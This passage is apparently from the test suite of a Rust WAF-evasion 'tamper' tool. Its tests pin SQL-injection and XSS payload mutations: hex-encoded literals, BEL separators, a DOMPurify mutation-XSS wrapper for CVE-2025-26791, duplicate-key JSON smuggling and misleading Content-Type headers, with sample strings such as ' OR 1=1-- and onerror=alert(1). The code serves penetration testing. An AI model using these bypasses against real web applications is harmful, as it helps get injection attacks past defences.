    // Regression guard. `keyword_comment_split` was dropped in 2026-05:
    // MySQL treats `/* */` inside an identifier as whitespace, so
    // `SE/**/LECT` lexes as TWO identifiers rather than one. The name must
    // stay absent from the default registry unless the parsing semantics
    // are re-validated first.
    let registry = crate::tamper::TamperRegistry::with_defaults();
    let lookup = registry.get("keyword_comment_split");
    assert!(
        lookup.is_none(),
        "keyword_comment_split was removed because the transform breaks SQL parsing — \
         do not re-register without verifying MySQL/Postgres tokeniser semantics"
    );
}
1893
1894    // ── Hex-literal keyword tamper ──────────────────────────
1895
#[test]
fn hex_literal_keyword_converts_single_quoted_to_hex() {
    let out = HexLiteralKeywordTamper.tamper("WHERE name = 'admin'", None);
    // The quoted form must be gone and a hex literal must have appeared.
    assert!(!out.contains("'admin'"));
    assert!(out.contains("0x"));
    // "admin" as ASCII bytes is 61 64 6d 69 6e.
    assert!(out.contains("0x61646d696e"));
}
1905
#[test]
fn hex_literal_keyword_idempotent_when_no_quoted_literal() {
    // With no quoted literal to convert, the payload is returned verbatim.
    let tamper = HexLiteralKeywordTamper;
    for payload in ["SELECT 1", "1=1"] {
        assert_eq!(tamper.tamper(payload, None), payload);
    }
}
1912
#[test]
fn hex_literal_keyword_handles_multiple_literals() {
    let out = HexLiteralKeywordTamper.tamper("'a' OR 'b'", None);
    // Both literals ('a' -> 0x61, 'b' -> 0x62) must be converted and the
    // keyword between them must be kept.
    for needle in ["0x61", "0x62", "OR"] {
        assert!(out.contains(needle));
    }
}
1923
#[test]
fn hex_literal_keyword_handles_doubled_quote_escape() {
    // In SQL a doubled `''` inside a literal stands for one single quote.
    // NOTE(review): the intent appears to be that it is encoded as a single
    // 0x27 byte, but only the presence of a hex prefix is asserted here.
    let out = HexLiteralKeywordTamper.tamper("'a''b'", None);
    assert!(out.contains("0x"));
}
1932
#[test]
fn hex_literal_keyword_empty_literal() {
    // The empty quoted literal `''` maps to the bare hex prefix `0x`.
    let converted = HexLiteralKeywordTamper.tamper("''", None);
    assert_eq!(converted, "0x");
}
1940
#[test]
fn hex_literal_keyword_preserves_non_quote_text() {
    // Text without quotes (keywords and numbers) must pass through as-is.
    let payload = "LIMIT 10 OFFSET 5";
    let out = HexLiteralKeywordTamper.tamper(payload, None);
    assert_eq!(out, "LIMIT 10 OFFSET 5");
}
1947
#[test]
fn hex_literal_keyword_non_ascii_chars_encode_to_utf8_hex() {
    // 'é' is the two UTF-8 bytes 0xC3 0xA9; either hex letter case is
    // accepted in the output.
    let out = HexLiteralKeywordTamper.tamper("'é'", None);
    let lower = out.contains("c3a9");
    let upper = out.contains("C3A9");
    assert!(lower || upper);
}
1955
1956    // ── Bell-separator tamper ───────────────────────────────
1957
#[test]
fn bell_separator_replaces_space_with_bel() {
    // The single ASCII space becomes BEL (U+0007).
    let out = BellSeparatorTamper.tamper("UNION SELECT", None);
    assert_eq!(out, "UNION\u{0007}SELECT");
}
1963
#[test]
fn bell_separator_leaves_tab_and_newline_alone() {
    // The input has a tab and a newline but no ASCII space, so both must
    // survive and no BEL may be introduced.
    let out = BellSeparatorTamper.tamper("a\tb\nc", None);
    for kept in ['\t', '\n'] {
        assert!(out.contains(kept));
    }
    assert!(!out.contains('\u{0007}'));
}
1973
#[test]
fn bell_separator_multiple_spaces_each_become_bel() {
    // Three consecutive spaces map to three BELs — no collapsing — and no
    // space is left behind.
    let out = BellSeparatorTamper.tamper("a   b", None);
    let bel_count = out.matches('\u{0007}').count();
    assert_eq!(bel_count, 3);
    assert!(!out.contains(' '));
}
1981
#[test]
fn bell_separator_empty_input() {
    // Edge case: empty in, empty out.
    let out = BellSeparatorTamper.tamper("", None);
    assert_eq!(out, "");
}
1987
#[test]
fn bell_separator_no_space_unchanged() {
    // A payload with no space has nothing to replace.
    let out = BellSeparatorTamper.tamper("foo", None);
    assert_eq!(out, "foo");
}
1993
#[test]
fn bell_separator_classic_payload_round_trips_via_split() {
    // Property: mapping every BEL back to a space must reproduce the
    // original payload exactly.
    let tamper = BellSeparatorTamper;
    for input in ["UNION SELECT 1", "OR 1=1 -- ", "<script>alert(1)</script>"] {
        let restored = tamper.tamper(input, None).replace('\u{0007}', " ");
        assert_eq!(restored, input);
    }
}
2006
#[test]
fn all_new_tampers_have_unique_names() {
    // Gather the strategy names and check that deduplicating them through
    // a set does not shrink the list.
    let names = [
        ZeroWidthInjectTamper.name(),
        PostgresDollarQuoteTamper.name(),
        MysqlVersionedCommentWrapTamper.name(),
        BracketConfusableTamper.name(),
        MxssNamespaceWrapTamper.name(),
    ];
    let distinct = names
        .iter()
        .copied()
        .collect::<std::collections::HashSet<&str>>()
        .len();
    assert_eq!(distinct, names.len());
}
2019
2020    // ── MxssNamespaceWrapTamper (CVE-2025-26791 / DOMPurify mXSS) ──
2021
#[test]
fn mxss_namespace_wrap_emits_mathml_harness() {
    let out = MxssNamespaceWrapTamper.tamper("onerror=alert(1)", None);

    // 1. The harness opens with the MathML root element.
    let has_math_root = out.starts_with("<math>");
    assert!(has_math_root, "missing MathML root: {out}");

    // 2. The `<style>` element is closed with a comment-open inside it —
    //    the load-bearing part of the trick.
    let has_style_trick = out.contains("<style><!--</style>");
    assert!(has_style_trick, "missing comment-trick style close: {out}");

    // 3. The operator's payload is carried as the attribute set of an
    //    `<img>` element.
    let has_payload = out.contains("<img src=x onerror=alert(1)>");
    assert!(has_payload, "payload missing: {out}");
}
2041
#[test]
fn mxss_namespace_wrap_does_not_contain_literal_script_tag() {
    // This is a mutation-XSS technique: the bytes on the wire must never
    // contain `<script` in any letter case. A regression that emitted a
    // literal `<script>` would defeat the bypass, since that token is
    // what WAFs block first.
    let out = MxssNamespaceWrapTamper.tamper("onerror=fetch('/x')", None);
    let lowered = out.to_ascii_lowercase();
    assert!(
        !lowered.contains("<script"),
        "namespace wrap MUST NOT emit literal <script>: {out}"
    );
}
2055
#[test]
fn mxss_namespace_wrap_handles_empty_payload() {
    // With nothing to embed, the harness is still produced and ends in an
    // `<img>` whose attribute slot is empty (note the trailing space
    // before `>`).
    let out = MxssNamespaceWrapTamper.tamper("", None);
    let opens_with_math = out.starts_with("<math>");
    assert!(opens_with_math, "empty payload still produces harness: {out}");
    let closes_with_img = out.ends_with("<img src=x >");
    assert!(closes_with_img, "empty payload yields bare <img>: {out}");
}
2069
#[test]
fn mxss_namespace_wrap_aggressiveness_in_range() {
    // The score must be a real number within [0, 1].
    let level = MxssNamespaceWrapTamper.aggressiveness();
    let in_unit_interval = (0.0..=1.0).contains(&level);
    assert!(in_unit_interval && !level.is_nan());
}
2075
#[test]
fn mxss_namespace_wrap_panic_safe_on_pathological_input() {
    // Smoke test: a 1,000,000-byte payload and a string of NUL / control /
    // replacement / zero-width characters must both be handled without
    // panicking. Outputs are discarded.
    let tamper = MxssNamespaceWrapTamper;
    let huge = "A".repeat(1_000_000);
    let _ = tamper.tamper(&huge, None);
    let _ = tamper.tamper("\0\x01\u{FFFD}\u{200B}", None);
}
2082
#[test]
fn all_new_tampers_have_non_empty_descriptions() {
    // Each listed strategy must describe itself, and with more than a
    // token blurb: over 20 bytes of text.
    let strategies: [&dyn TamperStrategy; 4] = [
        &ZeroWidthInjectTamper,
        &PostgresDollarQuoteTamper,
        &MysqlVersionedCommentWrapTamper,
        &BracketConfusableTamper,
    ];
    for strat in strategies {
        let description = strat.description();
        assert!(
            !description.is_empty(),
            "{} has empty description",
            strat.name()
        );
        assert!(
            description.len() > 20,
            "{} description too short",
            strat.name()
        );
    }
}
2103
#[test]
fn all_new_tampers_aggressiveness_in_range() {
    // Each listed strategy must report a non-NaN score within [0, 1].
    let strategies: [&dyn TamperStrategy; 4] = [
        &ZeroWidthInjectTamper,
        &PostgresDollarQuoteTamper,
        &MysqlVersionedCommentWrapTamper,
        &BracketConfusableTamper,
    ];
    for strat in strategies {
        let a = strat.aggressiveness();
        let valid = (0.0..=1.0).contains(&a) && !a.is_nan();
        assert!(
            valid,
            "{} aggressiveness {} out of [0, 1]",
            strat.name(),
            a
        );
    }
}
2121
#[test]
fn all_new_tampers_handle_pathological_input_without_panic() {
    // Smoke test: each listed strategy is fed three hostile inputs — the
    // empty string, a 1,000,000-byte run, and a mix of NUL / control /
    // DEL / replacement / zero-width characters. Outputs are discarded;
    // the only requirement is that nothing panics.
    let huge = "A".repeat(1_000_000);
    let weird = "\0\x01\x02\x7f\u{FFFD}\u{200B}";
    let strategies: [&dyn TamperStrategy; 4] = [
        &ZeroWidthInjectTamper,
        &PostgresDollarQuoteTamper,
        &MysqlVersionedCommentWrapTamper,
        &BracketConfusableTamper,
    ];
    for strat in strategies {
        for payload in ["", huge.as_str(), weird] {
            let _ = strat.tamper(payload, None);
        }
    }
}
2139
2140    // ── JsonDupKeyTamper (frontier 2026 / WAFFLED corpus) ────
2141
#[test]
fn json_dup_key_emits_duplicate_q_envelope() {
    let out = JsonDupKeyTamper.tamper("evil", None);
    // The key `q` must appear twice: first with the benign sentinel the
    // WAF is meant to see, then with the payload the backend is meant to
    // see.
    let has_sentinel = out.contains("\"q\":\"safe\"");
    assert!(has_sentinel, "missing first key: {out}");
    let has_payload = out.contains("\"q\":\"evil\"");
    assert!(has_payload, "missing dup key: {out}");
    // The whole thing must be wrapped in one pair of braces.
    assert!(out.starts_with('{') && out.ends_with('}'));
}
2153
#[test]
fn json_dup_key_escapes_payload_quotes() {
    // A double quote inside the payload must be escaped so that it cannot
    // terminate the JSON string early.
    let payload = "' OR 1=1--\"--";
    let out = JsonDupKeyTamper.tamper(payload, None);
    assert!(
        out.contains("OR 1=1--\\\"--"),
        "payload `\"` not escaped: {out}"
    );
    // The envelope must parse. serde_json keeps the LAST value for a
    // duplicated key, so `q` must decode back to the raw payload.
    let parsed: serde_json::Value = serde_json::from_str(&out)
        .expect("envelope must be valid JSON even with escaped quote");
    assert_eq!(parsed["q"].as_str(), Some("' OR 1=1--\"--"));
}
2170
#[test]
fn json_dup_key_escapes_backslash_and_control_bytes() {
    let out = JsonDupKeyTamper.tamper("a\\b\nc\rd\te\u{0007}f", None);
    // A backslash is doubled; newline, carriage return and tab use their
    // short JSON escapes.
    for escaped in ["a\\\\b", "\\n", "\\r", "\\t"] {
        assert!(out.contains(escaped));
    }
    // BEL (0x07) must be emitted in the generic `\u0007` form.
    assert!(out.contains("\\u0007"), "BEL not escaped to \\u0007: {out}");
    // The envelope must still parse as JSON.
    let _: serde_json::Value = serde_json::from_str(&out).expect("valid JSON");
}
2185
#[test]
fn json_dup_key_handles_empty_payload() {
    // An empty payload is allowed: both keys are still emitted and the
    // second one carries the empty string.
    let envelope = JsonDupKeyTamper.tamper("", None);
    assert_eq!(envelope, "{\"q\":\"safe\",\"q\":\"\"}");
}
2194
#[test]
fn json_dup_key_name_and_aggressiveness_within_bounds() {
    // Pins the strategy name and checks the score lies in [0, 1].
    let tamper = JsonDupKeyTamper;
    assert_eq!(tamper.name(), "json_dup_key");
    let a = tamper.aggressiveness();
    let in_bounds = (0.0..=1.0).contains(&a);
    assert!(in_bounds, "aggressiveness out of range: {a}");
}
2202
#[test]
fn json_dup_key_is_registered_in_default_registry() {
    // Wiring guard. Forgetting to add the tamper to DEFAULT_NAMES and to
    // the `with_defaults` match arm fails silently: the type exists but
    // cannot be selected via `--only`. This pins the registration.
    let registry = crate::tamper::TamperRegistry::with_defaults();
    let registered = registry.get("json_dup_key").is_some();
    assert!(
        registered,
        "json_dup_key must be in TamperRegistry::with_defaults()"
    );
}
2215
2216    // ── CtStarvationTamper (frontier 2026 / WAFFLED + windshock) ──
2217
#[test]
fn ct_starvation_wraps_body_context_in_form_pair() {
    // In the "body" context the payload becomes the value of a `q=` form
    // pair; the payload itself is left as-is.
    let wrapped = CtStarvationTamper.tamper("' OR 1=1--", Some("body"));
    assert_eq!(wrapped, "q=' OR 1=1--");
}
2224
#[test]
fn ct_starvation_handles_form_json_multipart_contexts() {
    // Every body-like context must get the same `q=<payload>` wrap.
    const BODY_CONTEXTS: [&str; 4] = ["body", "form", "json", "multipart"];
    let tamper = CtStarvationTamper;
    for ctx in BODY_CONTEXTS {
        let wrapped = tamper.tamper("X", Some(ctx));
        assert_eq!(wrapped, "q=X", "context {ctx} must produce form-pair wrap");
    }
}
2236
#[test]
fn ct_starvation_is_no_op_for_header_and_query_contexts() {
    // The technique has no leverage in header / cookie / query carriers,
    // nor when no context is given. Returning the payload untouched is the
    // honest behaviour: an operator who selects `--target-context header`
    // gets a no-op variant they can spot in `--explain`.
    let tamper = CtStarvationTamper;
    let contexts = [Some("header"), Some("cookie"), Some("query"), None];
    for context in contexts {
        assert_eq!(tamper.tamper("X", context), "X");
    }
}
2249
#[test]
fn ct_starvation_header_for_returns_one_of_known_variants() {
    // The hash-dispatched header must always come from the documented set.
    // Canonical lowercase "application/json" is deliberately absent from
    // the list: emitting it offers no bypass and would defeat the tamper.
    const ALLOWED: &[&str] = &[
        "APPLICATION/JSON",
        "Application/Json",
        "application/json; charset=ibm037",
        "text/plain",
        "application/x-www-form-urlencoded",
    ];
    let payloads = ["a", "longer-payload", "' OR 1=1--", ""];
    for p in payloads {
        let ct = ct_starvation_header_for(p);
        let known = ALLOWED.contains(&ct);
        assert!(known, "header for {p:?} not in known-effective set: {ct}");
    }
}
2271
#[test]
fn ct_starvation_header_for_is_stable_per_payload() {
    // Asking twice for the same payload must give the same header, so an
    // operator who re-runs a failing case sees the same Content-Type.
    for p in ["x", "very long payload bytes here"] {
        let (first, second) = (ct_starvation_header_for(p), ct_starvation_header_for(p));
        assert_eq!(
            first, second,
            "ct_starvation_header_for not stable for {p:?}"
        );
    }
}
2283
#[test]
fn ct_starvation_is_registered_in_default_registry() {
    // Wiring guard: the tamper must be reachable by name through the
    // default registry.
    let registry = crate::tamper::TamperRegistry::with_defaults();
    let registered = registry.get("ct_starvation").is_some();
    assert!(
        registered,
        "ct_starvation must be in TamperRegistry::with_defaults()"
    );
}
2292
#[test]
fn json_escape_string_matches_serde_json_for_unicode() {
    // `json_escape_string` is hand-rolled, so check it against serde_json:
    // for benign text (plain ASCII, accented Latin, CJK, emoji) the escaped
    // form, once wrapped in quotes, must parse back to exactly the input —
    // i.e. nothing is double-escaped and nothing is left unescaped.
    let samples = ["plain ASCII", "café", "日本語", "🔥"];
    for raw in samples {
        let wrapped = format!("\"{}\"", json_escape_string(raw));
        let parsed: String = match serde_json::from_str(&wrapped) {
            Ok(decoded) => decoded,
            Err(e) => panic!("our escape of {raw:?} fails JSON parse: {e}"),
        };
        assert_eq!(parsed, raw);
    }
}
2307}